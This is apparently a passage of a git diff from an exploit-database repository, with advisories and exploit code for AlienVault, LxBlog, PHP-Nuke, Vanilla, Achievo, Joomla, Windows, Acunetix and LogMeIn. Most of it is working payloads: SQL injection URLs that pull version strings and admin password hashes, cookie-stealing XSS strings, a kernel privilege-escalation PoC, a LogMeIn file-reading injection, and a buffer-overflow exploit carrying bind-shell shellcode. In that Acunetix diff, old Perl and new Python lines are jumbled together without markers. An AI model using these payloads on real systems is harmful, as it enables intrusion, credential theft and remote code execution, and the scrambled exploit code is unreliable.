https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01&date_to=2013-07-30%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-
https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2&date_to=2%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-
https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2
https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((concat(0x3c7363726970743e616c6572742822,database%20version:,@@version,0x22293c2f7363726970743e)),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2
Response:
Duplicate entry 5.5.29-29.41 for key group_key
Pulling “admin” user password hashes:
https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select pass from alienvault.users where login=admin),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2
Cross Site Scripting:
The following examples demonstrate the use of unfiltered MySQL errors as an XSS vector:
Vanilla XSS
https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01%20union%20select%200”<script>alert(GDS)</script>,2%20—%20-&date_to=2013-07-30
ASCII Encoded XSS Variant (useful in bypassing application layer filters)
https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01%20union%20select%200x27223e3c7363726970743e616c6572742831293c2f7363726970743e,2%20—%20-&date_to=2013-07-30
===========================================================
Recommendation
===========================================================
AlienVault deployments should be upgraded to the latest stable version. The issues documented in this disclosure have been remediated in AlienVault 4.3.2.

13
platforms/php/webapps/33008.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/35071/info
LxBlog is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example URIs are available:
http://www.example.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND
if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND
if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*
http://www.example.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS]

13
platforms/php/webapps/33011.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/35117/info
PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP-Nuke 8.0.0 is vulnerable; other versions may also be affected.
The following sample request is available:
GET http://www.example.com/PHP-Nuke-8.0/index.php HTTP/1.0
Accept: */*
referer: '+IF(False,'',SLEEP(5))+'

9
platforms/php/webapps/33013.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35124/info
Vanilla is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Vanilla 1.1.8 are vulnerable.
http://www.example.com/ajax/updatecheck.php?PostBackKey=1&ExtensionKey=1&RequestName=1<script>alert(123)</script>

11
platforms/php/webapps/33014.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35140/info
Achievo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Achievo 1.3.4 is vulnerable; other versions may also be affected.
http://www.example.com/achievo/index.php?"><script>alert(0)</script>
http://www.example.com/achievo/dispatch.php?atknodetype=pim.pim&atkaction=<script>alert(document.cookie)</script>

9
platforms/php/webapps/33021.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35180/info
PHP-Nuke is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP-Nuke 8.0 is vulnerable; other versions may also be affected.
http://www.example.com/modules.php?name=Downloads&d_op=search&query=&#039;&#039;;!--"[script]alert(document.cookie)[/script]

17
platforms/php/webapps/33022.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/35189/info
Joomla! is prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues affect the 'com_user' component, the 'JA_Purity' template, and the administrative panel in the 'Site client' subproject of the application.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
Versions prior to Joomla!1.5.11 are vulnerable.
http://www.example.com/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://www.example.com/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://www.example.com/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://www.example.com/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://www.example.com/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
http://www.example.com/path/?excludeModules=%27;alert(8);%20var%20b=%27
http://www.example.com/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27
http://www.example.com/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E

17
platforms/windows/local/33012.c Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/35120/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
#include <windows.h>
int main()
{
WCHAR c[1000] = {0};
memset(c, ?c?, 1000);
SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);
WCHAR b[1000] = {0};
SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
return 0;
}

223
platforms/windows/remote/32997.pl
View file

@ -1,81 +1,150 @@
# Exploit Title: Acunetix Stack Based overflow
# Date: 24/04/14
# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Vendor Homepage: http://www.acunetix.com/
# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
# Version: 8 build 20120704
# Tested on: XP
#!/usr/bin/python
# Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit
# Version: 8
# Build: 20120704
# Tested on: Windows XP SP2 en
# Vendor: http://www.acunetix.com/
# Original Advisory: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Exploit-Author: Osanda Malith
# Follow @OsandaMalith
# Exploit write-up: http://osandamalith.wordpress.com/2014/04/24/pwning-script-kiddies-acunetix-buffer-overflow/
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
# Video: https://www.youtube.com/watch?v=RHaMx8K1GeM
# CVE: CVE-2014-2994
'''
Host the generated file in a server. The victim should select the external host. Otherwise we cannot trigger
the vulnerability.
'''
print ('[~] Acunetix Web Vulnerability Scanner Buffer Overflow Exploit\n')
while True:
try:
choice = int(raw_input("[?] Choose your payload:\n1. Calculator\n2. Bind Shell\n"))
except ValueError:
print "[!] Enter only a number"
continue
if choice == 1:
shellcode = ""
shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x49\x6c\x6d\x38\x6e\x69\x75\x50\x73\x30\x77\x70\x63"
shellcode += "\x50\x6f\x79\x68\x65\x30\x31\x49\x42\x63\x54\x4c\x4b"
shellcode += "\x31\x42\x46\x50\x4c\x4b\x46\x32\x44\x4c\x6e\x6b\x70"
shellcode += "\x52\x46\x74\x4c\x4b\x64\x32\x34\x68\x64\x4f\x4e\x57"
shellcode += "\x30\x4a\x35\x76\x66\x51\x69\x6f\x64\x71\x69\x50\x6e"
shellcode += "\x4c\x65\x6c\x71\x71\x61\x6c\x77\x72\x74\x6c\x31\x30"
shellcode += "\x69\x51\x4a\x6f\x54\x4d\x53\x31\x69\x57\x39\x72\x58"
shellcode += "\x70\x71\x42\x53\x67\x6e\x6b\x63\x62\x74\x50\x6e\x6b"
shellcode += "\x53\x72\x57\x4c\x77\x71\x48\x50\x6c\x4b\x37\x30\x31"
shellcode += "\x68\x4e\x65\x4b\x70\x43\x44\x31\x5a\x36\x61\x58\x50"
shellcode += "\x62\x70\x6c\x4b\x31\x58\x34\x58\x6e\x6b\x42\x78\x77"
shellcode += "\x50\x36\x61\x38\x53\x6b\x53\x67\x4c\x57\x39\x4e\x6b"
shellcode += "\x77\x44\x4e\x6b\x47\x71\x69\x46\x34\x71\x49\x6f\x64"
shellcode += "\x71\x39\x50\x6c\x6c\x6f\x31\x7a\x6f\x46\x6d\x47\x71"
shellcode += "\x69\x57\x35\x68\x59\x70\x71\x65\x49\x64\x57\x73\x33"
shellcode += "\x4d\x6a\x58\x35\x6b\x43\x4d\x67\x54\x31\x65\x6d\x32"
shellcode += "\x61\x48\x6c\x4b\x51\x48\x34\x64\x66\x61\x6e\x33\x35"
shellcode += "\x36\x6c\x4b\x66\x6c\x30\x4b\x4e\x6b\x43\x68\x45\x4c"
shellcode += "\x33\x31\x4a\x73\x4c\x4b\x53\x34\x4e\x6b\x53\x31\x4e"
shellcode += "\x30\x4c\x49\x37\x34\x54\x64\x54\x64\x73\x6b\x31\x4b"
shellcode += "\x31\x71\x52\x79\x42\x7a\x53\x61\x79\x6f\x69\x70\x42"
shellcode += "\x78\x63\x6f\x43\x6a\x6c\x4b\x77\x62\x7a\x4b\x6c\x46"
shellcode += "\x53\x6d\x70\x6a\x57\x71\x4c\x4d\x4e\x65\x6e\x59\x53"
shellcode += "\x30\x45\x50\x47\x70\x52\x70\x52\x48\x44\x71\x6e\x6b"
shellcode += "\x42\x4f\x4b\x37\x6b\x4f\x78\x55\x4d\x6b\x6b\x50\x45"
shellcode += "\x4d\x56\x4a\x47\x7a\x50\x68\x4f\x56\x4e\x75\x6f\x4d"
shellcode += "\x4f\x6d\x59\x6f\x68\x55\x77\x4c\x46\x66\x51\x6c\x65"
shellcode += "\x5a\x6d\x50\x6b\x4b\x4b\x50\x44\x35\x56\x65\x6f\x4b"
shellcode += "\x71\x57\x64\x53\x54\x32\x42\x4f\x53\x5a\x33\x30\x61"
shellcode += "\x43\x49\x6f\x68\x55\x33\x53\x33\x51\x52\x4c\x43\x53"
shellcode += "\x65\x50\x41\x41"
break
#This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed.
my $file= "index.html";
my $HTMLHeader1 = "<html>\r\n";
my $HTMLHeader2 = "\r\n</html>";
my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://";
my $IMGheader2 = "><br>\n";
elif choice == 2:
# Modify this part with your own custom shellcode
# msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t python shellcodeferRegister=ESP
shellcode = ""
shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x4b\x58\x6c\x49\x65\x50\x73\x30\x73\x30\x31"
shellcode += "\x70\x6e\x69\x48\x65\x70\x31\x59\x42\x55\x34\x4c\x4b"
shellcode += "\x42\x72\x76\x50\x6c\x4b\x73\x62\x76\x6c\x4c\x4b\x53"
shellcode += "\x62\x57\x64\x6e\x6b\x63\x42\x34\x68\x66\x6f\x48\x37"
shellcode += "\x30\x4a\x54\x66\x55\x61\x79\x6f\x55\x61\x4b\x70\x4c"
shellcode += "\x6c\x35\x6c\x30\x61\x33\x4c\x75\x52\x64\x6c\x67\x50"
shellcode += "\x6f\x31\x5a\x6f\x54\x4d\x47\x71\x48\x47\x6b\x52\x38"
shellcode += "\x70\x61\x42\x46\x37\x6e\x6b\x32\x72\x66\x70\x6e\x6b"
shellcode += "\x73\x72\x75\x6c\x73\x31\x4e\x30\x6e\x6b\x71\x50\x43"
shellcode += "\x48\x4b\x35\x49\x50\x61\x64\x72\x6a\x33\x31\x78\x50"
shellcode += "\x76\x30\x4c\x4b\x77\x38\x35\x48\x6e\x6b\x53\x68\x61"
shellcode += "\x30\x65\x51\x5a\x73\x69\x73\x77\x4c\x50\x49\x4e\x6b"
shellcode += "\x56\x54\x6e\x6b\x45\x51\x69\x46\x75\x61\x6b\x4f\x66"
shellcode += "\x51\x49\x50\x6c\x6c\x4b\x71\x78\x4f\x56\x6d\x35\x51"
shellcode += "\x4a\x67\x50\x38\x59\x70\x61\x65\x39\x64\x67\x73\x31"
shellcode += "\x6d\x6a\x58\x45\x6b\x43\x4d\x76\x44\x50\x75\x49\x72"
shellcode += "\x52\x78\x6e\x6b\x61\x48\x46\x44\x43\x31\x68\x53\x45"
shellcode += "\x36\x4e\x6b\x34\x4c\x42\x6b\x6e\x6b\x73\x68\x35\x4c"
shellcode += "\x57\x71\x6b\x63\x4c\x4b\x53\x34\x6c\x4b\x43\x31\x4e"
shellcode += "\x30\x4e\x69\x32\x64\x47\x54\x56\x44\x73\x6b\x61\x4b"
shellcode += "\x75\x31\x31\x49\x72\x7a\x76\x31\x59\x6f\x59\x70\x61"
shellcode += "\x48\x51\x4f\x31\x4a\x6c\x4b\x52\x32\x78\x6b\x6e\x66"
shellcode += "\x43\x6d\x42\x48\x67\x43\x45\x62\x37\x70\x63\x30\x72"
shellcode += "\x48\x42\x57\x32\x53\x76\x52\x31\x4f\x42\x74\x50\x68"
shellcode += "\x52\x6c\x64\x37\x64\x66\x44\x47\x39\x6f\x69\x45\x4d"
shellcode += "\x68\x5a\x30\x65\x51\x57\x70\x63\x30\x76\x49\x59\x54"
shellcode += "\x31\x44\x52\x70\x45\x38\x64\x69\x4f\x70\x50\x6b\x57"
shellcode += "\x70\x59\x6f\x7a\x75\x52\x70\x52\x70\x32\x70\x52\x70"
shellcode += "\x47\x30\x30\x50\x67\x30\x66\x30\x63\x58\x48\x6a\x54"
shellcode += "\x4f\x49\x4f\x69\x70\x79\x6f\x4e\x35\x4c\x57\x45\x61"
shellcode += "\x6b\x6b\x51\x43\x73\x58\x73\x32\x57\x70\x34\x51\x73"
shellcode += "\x6c\x6f\x79\x4a\x46\x42\x4a\x76\x70\x46\x36\x50\x57"
shellcode += "\x71\x78\x7a\x62\x4b\x6b\x70\x37\x72\x47\x6b\x4f\x48"
shellcode += "\x55\x62\x73\x51\x47\x72\x48\x4c\x77\x78\x69\x47\x48"
shellcode += "\x4b\x4f\x69\x6f\x48\x55\x30\x53\x52\x73\x53\x67\x45"
shellcode += "\x38\x62\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x5a\x75"
shellcode += "\x72\x77\x6c\x57\x62\x48\x54\x35\x50\x6e\x32\x6d\x35"
shellcode += "\x31\x4b\x4f\x69\x45\x61\x7a\x77\x70\x32\x4a\x73\x34"
shellcode += "\x62\x76\x61\x47\x70\x68\x63\x32\x78\x59\x4a\x68\x31"
shellcode += "\x4f\x49\x6f\x48\x55\x6e\x6b\x46\x56\x51\x7a\x71\x50"
shellcode += "\x62\x48\x65\x50\x46\x70\x63\x30\x43\x30\x31\x46\x32"
shellcode += "\x4a\x55\x50\x71\x78\x31\x48\x49\x34\x66\x33\x6b\x55"
shellcode += "\x59\x6f\x4e\x35\x4f\x63\x72\x73\x71\x7a\x37\x70\x30"
shellcode += "\x56\x70\x53\x71\x47\x45\x38\x74\x42\x38\x59\x6f\x38"
shellcode += "\x33\x6f\x49\x6f\x69\x45\x67\x71\x79\x53\x76\x49\x6b"
shellcode += "\x76\x6f\x75\x48\x76\x62\x55\x58\x6c\x49\x53\x41\x41"
my $DomainName1 = "XSS";
my $DomainName2 = "CSRF";
my $DomainName3 = "DeepScan";
my $DomainName4 = "NetworkScan";
my $DomainName5 = "DenialOfService";
my $GeneralDotPadding = "." x 190;
print "[+] Connect on port 4444"
break
else:
print "[-] Invalid Choice"
continue
my $ExploitDomain = "SQLInjection";
my $DotPadding = "." x (202-length($ExploitDomain));
my $Padding1 = "A"x66;
my $Padding2 = "B"x4;
my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flow
my $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).
head = ("<html>\
<body>\
<center><h1>Scan This Site and Get Pwned :)</h1></center><br>")
junk = ("\
<a href= \"http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAA")
edx = "500f"
junk2 = "BBBB"
# jmp esp | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [WINHTTP.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.2180 (C:\WINDOWS\system32\WINHTTP.dll)
eip = "\x49\x63\x52\x4d"
# windows/exec - 461 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# CMD=calc.exe
my $shellcode2 =
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a" .
"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48" .
"\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51" .
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43" .
"\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53" .
"\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c" .
"\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51" .
"\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51" .
"\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37" .
"\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58" .
"\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46" .
"\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45" .
"\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42" .
"\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52" .
"\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47" .
"\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36" .
"\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54" .
"\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35" .
"\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a" .
"\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32" .
"\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43" .
"\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b" .
"\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36" .
"\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30" .
"\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53" .
"\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46" .
"\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58" .
"\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e" .
"\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43" .
"\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34" .
"\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33" .
"\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35" .
"\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41";
my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;
my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;
open($FILE,">$file");
print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;
close($FILE);
print "Acunetix Killer File Created successfully\n";
shellcode += "\">"
tail = ("<img src=\"http://i.imgur.com/BimAoR0.jpg\">\
</body>\
</html>")
exploit = head + junk + edx + junk2 + eip + shellcode + tail
filename = "Exploit.htm"
file = open(filename, "w")
file.write(exploit)
file.close()
print "[~] " + str(len(exploit)) + " Bytes written to file"
#EOF

11
platforms/windows/remote/33025.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35236/info
LogMeIn is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sufficiently sanitize input.
By inserting arbitrary headers into an HTTP response, attackers may be able to launch various attacks, including cross-site request forgery, cross-site scripting, and HTTP-request smuggling.
LogMeIn 4.0.784 is vulnerable; other versions may also be affected.
The following example URI is available:
http://securethoughts.com/2009/06/multiple-vulnerabilities-in-logmein-web-interface-can-be-used-to-control-your-computer-and-steal-arbitary-files/#viewSource
http://www.example.com/cfgadvanced.html?op=update&DisconnectExisting=1&NoHttpCompr=1&CrashDumpInfo=0&lang=en-US%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3C/body%3E%3CSCRIPT%3Evar%20ifr%3Dnull%3Bfunction%20al%28%29%7Bvar%20str%3D%28window.frames%5B0%5D.document.body.innerHTML%20%7C%7C%20ifr.contentDocument.documentElement.innerHTML%29%3Balert%28str.substring%28%28str.toLowerCase%28%29%29.indexOf%28%22%3Clegend%3E%22%2C400%29%29%29%3B%7D%20if%28window.location.href.match%28/.*cfgad.*/%29%29%7Bifr%3Ddocument.createElement%28%22iframe%22%29%3Bifr.src%3D%22https%3A//localhost%3A2002/logs.html%3Flog%3D../../../windows/win.ini%22%3Bdocument.body.appendChild%28ifr%29%3BsetTimeout%28%22al%28%29%22%2C4000%29%3B%7D%3C/script%3E%3C%21--